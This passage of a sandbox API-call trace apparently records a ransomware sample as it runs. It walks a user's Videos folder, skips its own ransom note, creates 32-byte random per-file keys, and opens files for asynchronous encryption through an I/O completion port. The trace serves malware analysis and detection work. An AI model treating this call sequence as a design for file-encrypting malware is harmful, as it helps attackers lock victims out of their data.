param_1=0x4ebda42, param_2="%02X" | out: param_1="86") returned 2 [0168.811] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="E1") returned 2 [0168.811] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="72") returned 2 [0168.811] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="AD") returned 2 [0168.811] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="06") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="83") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="EE") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="6C") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="3D") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="C7") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="70") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="1F") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="CF") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="88") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="D2") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="D0") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="52") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="87") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="45") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="41") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="A1") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="28") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="6A") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="9E") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="7B") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="F5") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="64") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="92") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="69") returned 2 [0168.813] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\cBIayRuO2o1rUi4dxeN.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\cBIayRuO2o1rUi4dxeN.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\cBIayRuO2o1rUi4dxeN.flv" [0168.813] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.813] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0168.813] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21774d00, ftCreationTime.dwHighDateTime=0x1d7d9df, ftLastAccessTime.dwLowDateTime=0xe46e3180, ftLastAccessTime.dwHighDateTime=0x1d7deb6, ftLastWriteTime.dwLowDateTime=0xe46e3180, ftLastWriteTime.dwHighDateTime=0x1d7deb6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x161fafa, dwReserved1=0x0, cFileName="ff3aNZOdEdDnbufSZH", cAlternateFileName="FF3ANZ~1")) returned 1 [0168.813] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH") returned 62 [0168.813] GetProcessHeap () returned 0x270000 [0168.813] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x749a470 [0168.814] lstrcpyW (in: lpString1=0x749a470, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH" [0168.814] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\*" [0168.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21774d00, ftCreationTime.dwHighDateTime=0x1d7d9df, ftLastAccessTime.dwLowDateTime=0xe46e3180, ftLastAccessTime.dwHighDateTime=0x1d7deb6, ftLastWriteTime.dwLowDateTime=0xe46e3180, ftLastWriteTime.dwHighDateTime=0x1d7deb6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff399580, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0168.815] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21774d00, ftCreationTime.dwHighDateTime=0x1d7d9df, ftLastAccessTime.dwLowDateTime=0xe46e3180, ftLastAccessTime.dwHighDateTime=0x1d7deb6, ftLastWriteTime.dwLowDateTime=0xe46e3180, ftLastWriteTime.dwHighDateTime=0x1d7deb6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff399580, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0168.815] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a5fa10, ftCreationTime.dwHighDateTime=0x1d7da81, ftLastAccessTime.dwLowDateTime=0x1c07b6f0, ftLastAccessTime.dwHighDateTime=0x1d7dce8, ftLastWriteTime.dwLowDateTime=0x1c07b6f0, ftLastWriteTime.dwHighDateTime=0x1d7dce8, nFileSizeHigh=0x0, nFileSizeLow=0x14174, dwReserved0=0xff399580, dwReserved1=0xffffffff, cFileName="7Zpw3f.swf", cAlternateFileName="")) returned 1 [0168.815] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\7Zpw3f.swf") returned 73 [0168.815] lstrcmpW (lpString1="7Zpw3f.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.815] PathFindExtensionW (pszPath="7Zpw3f.swf") returned=".swf" [0168.815] lstrlenW (lpString=".swf") returned 4 [0168.815] PathFindExtensionW (pszPath="7Zpw3f.swf") returned=".swf" [0168.815] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d6fb6c0, ftCreationTime.dwHighDateTime=0x1d7e2d3, ftLastAccessTime.dwLowDateTime=0x395ce4c0, ftLastAccessTime.dwHighDateTime=0x1d7e5a6, ftLastWriteTime.dwLowDateTime=0x395ce4c0, ftLastWriteTime.dwHighDateTime=0x1d7e5a6, nFileSizeHigh=0x0, nFileSizeLow=0x130df, dwReserved0=0xff399580, dwReserved1=0xffffffff, cFileName="8LVO2zw 0SL.swf", cAlternateFileName="8LVO2Z~1.SWF")) returned 1 [0168.815] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\8LVO2zw 0SL.swf") returned 78 [0168.815] lstrcmpW (lpString1="8LVO2zw 0SL.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.815] PathFindExtensionW (pszPath="8LVO2zw 0SL.swf") returned=".swf" [0168.815] lstrlenW (lpString=".swf") returned 4 [0168.815] PathFindExtensionW (pszPath="8LVO2zw 0SL.swf") returned=".swf" [0168.815] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x382bcb60, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x462cd7c0, ftLastAccessTime.dwHighDateTime=0x1d7e2de, ftLastWriteTime.dwLowDateTime=0x462cd7c0, ftLastWriteTime.dwHighDateTime=0x1d7e2de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff399580, dwReserved1=0xffffffff, cFileName="NHb7HDfTbT", cAlternateFileName="NHB7HD~1")) returned 1 [0168.815] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT") returned 73 [0168.815] GetProcessHeap () returned 0x270000 [0168.815] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ab480 [0168.817] lstrcpyW (in: lpString1=0x74ab480, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT" [0168.817] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\*" [0168.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x382bcb60, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x462cd7c0, ftLastAccessTime.dwHighDateTime=0x1d7e2de, ftLastWriteTime.dwLowDateTime=0x462cd7c0, ftLastWriteTime.dwHighDateTime=0x1d7e2de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0168.817] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x382bcb60, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x462cd7c0, ftLastAccessTime.dwHighDateTime=0x1d7e2de, ftLastWriteTime.dwLowDateTime=0x462cd7c0, ftLastWriteTime.dwHighDateTime=0x1d7e2de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.817] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0df3340, ftCreationTime.dwHighDateTime=0x1d7d964, ftLastAccessTime.dwLowDateTime=0xf5f570, ftLastAccessTime.dwHighDateTime=0x1d7e4bd, ftLastWriteTime.dwLowDateTime=0xf5f570, ftLastWriteTime.dwHighDateTime=0x1d7e4bd, nFileSizeHigh=0x0, nFileSizeLow=0x73a9, dwReserved0=0x0, dwReserved1=0x60, cFileName="NEYt5FKRpZBU7vt-Z.swf", cAlternateFileName="NEYT5F~1.SWF")) returned 1 [0168.817] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\NEYt5FKRpZBU7vt-Z.swf") returned 95 [0168.817] lstrcmpW (lpString1="NEYt5FKRpZBU7vt-Z.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.817] PathFindExtensionW (pszPath="NEYt5FKRpZBU7vt-Z.swf") returned=".swf" [0168.817] lstrlenW (lpString=".swf") returned 4 [0168.817] PathFindExtensionW (pszPath="NEYt5FKRpZBU7vt-Z.swf") returned=".swf" [0168.817] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e5d5000, ftCreationTime.dwHighDateTime=0x1d7de30, ftLastAccessTime.dwLowDateTime=0xa86bb210, ftLastAccessTime.dwHighDateTime=0x1d7dfd4, ftLastWriteTime.dwLowDateTime=0xa86bb210, ftLastWriteTime.dwHighDateTime=0x1d7dfd4, nFileSizeHigh=0x0, nFileSizeLow=0x35fe, dwReserved0=0x0, dwReserved1=0x60, cFileName="pVn3Tay0r5Q-vO94zaW.flv", cAlternateFileName="PVN3TA~1.FLV")) returned 1 [0168.817] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\pVn3Tay0r5Q-vO94zaW.flv") returned 97 [0168.817] lstrcmpW (lpString1="pVn3Tay0r5Q-vO94zaW.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.817] PathFindExtensionW (pszPath="pVn3Tay0r5Q-vO94zaW.flv") returned=".flv" [0168.817] lstrlenW (lpString=".flv") returned 4 [0168.818] PathFindExtensionW (pszPath="pVn3Tay0r5Q-vO94zaW.flv") returned=".flv" [0168.818] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\pVn3Tay0r5Q-vO94zaW.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\nhb7hdftbt\\pvn3tay0r5q-vo94zaw.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0168.818] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=13822) returned 1 [0168.818] GetProcessHeap () returned 0x270000 [0168.818] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x750a450 [0168.822] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="C1") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="8D") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="31") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="3A") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="CF") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="5D") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="6E") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="28") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="6A") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="60") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="67") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="68") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="6E") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="82") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="A1") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="3E") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="6E") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="57") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="86") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="74") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="B9") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="D5") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="7E") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="4C") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="0E") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="90") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="12") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="14") returned 2 [0168.823] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="24") returned 2 [0168.823] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="A3") returned 2 [0168.823] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="BA") returned 2 [0168.823] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="5D") returned 2 [0168.823] lstrcpyW (in: lpString1=0x751a504, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\pVn3Tay0r5Q-vO94zaW.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\pVn3Tay0r5Q-vO94zaW.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\pVn3Tay0r5Q-vO94zaW.flv" [0168.823] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x750a450, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.823] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x750a450, lpOverlapped=0x750a450) returned 1 [0168.823] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd242a230, ftCreationTime.dwHighDateTime=0x1d7ddcf, ftLastAccessTime.dwLowDateTime=0x49fa0460, ftLastAccessTime.dwHighDateTime=0x1d7de54, ftLastWriteTime.dwLowDateTime=0x49fa0460, ftLastWriteTime.dwHighDateTime=0x1d7de54, nFileSizeHigh=0x0, nFileSizeLow=0x15835, dwReserved0=0x0, dwReserved1=0x60, cFileName="QChc1FA8TTInewQZQ.flv", cAlternateFileName="QCHC1F~1.FLV")) returned 1 [0168.823] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\QChc1FA8TTInewQZQ.flv") returned 95 [0168.823] lstrcmpW (lpString1="QChc1FA8TTInewQZQ.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.823] PathFindExtensionW (pszPath="QChc1FA8TTInewQZQ.flv") returned=".flv" [0168.823] lstrlenW (lpString=".flv") returned 4 [0168.823] PathFindExtensionW (pszPath="QChc1FA8TTInewQZQ.flv") returned=".flv" [0168.824] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\QChc1FA8TTInewQZQ.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\nhb7hdftbt\\qchc1fa8ttinewqzq.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0168.824] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=88117) returned 1 [0168.824] GetProcessHeap () returned 0x270000 [0168.824] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75325a8 [0168.828] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="40") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="D5") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="62") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="38") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="5B") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="09") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="12") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="62") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="DA") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="4A") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="8D") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="35") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="4C") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="00") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="AD") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="02") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="02") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="42") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="81") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="1E") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="CF") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="C5") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="C3") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="CE") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="E1") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="AF") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="DE") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="51") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="0F") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="94") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="8F") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="6B") returned 2 [0168.829] lstrcpyW (in: lpString1=0x754265c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\QChc1FA8TTInewQZQ.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\QChc1FA8TTInewQZQ.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\QChc1FA8TTInewQZQ.flv" [0168.829] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x75325a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.830] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75325a8, lpOverlapped=0x75325a8) returned 1 [0168.830] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78d33ea0, ftCreationTime.dwHighDateTime=0x1d7e35e, ftLastAccessTime.dwLowDateTime=0xc43d3890, ftLastAccessTime.dwHighDateTime=0x1d7e41d, ftLastWriteTime.dwLowDateTime=0xc43d3890, ftLastWriteTime.dwHighDateTime=0x1d7e41d, nFileSizeHigh=0x0, nFileSizeLow=0x7032, dwReserved0=0x0, dwReserved1=0x60, cFileName="v259nuYkhXPWX.mp4", cAlternateFileName="V259NU~1.MP4")) returned 1 [0168.830] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\v259nuYkhXPWX.mp4") returned 91 [0168.830] lstrcmpW (lpString1="v259nuYkhXPWX.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.830] PathFindExtensionW (pszPath="v259nuYkhXPWX.mp4") returned=".mp4" [0168.830] lstrlenW (lpString=".mp4") returned 4 [0168.830] PathFindExtensionW (pszPath="v259nuYkhXPWX.mp4") returned=".mp4" [0168.830] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\v259nuYkhXPWX.mp4" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\nhb7hdftbt\\v259nuykhxpwx.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 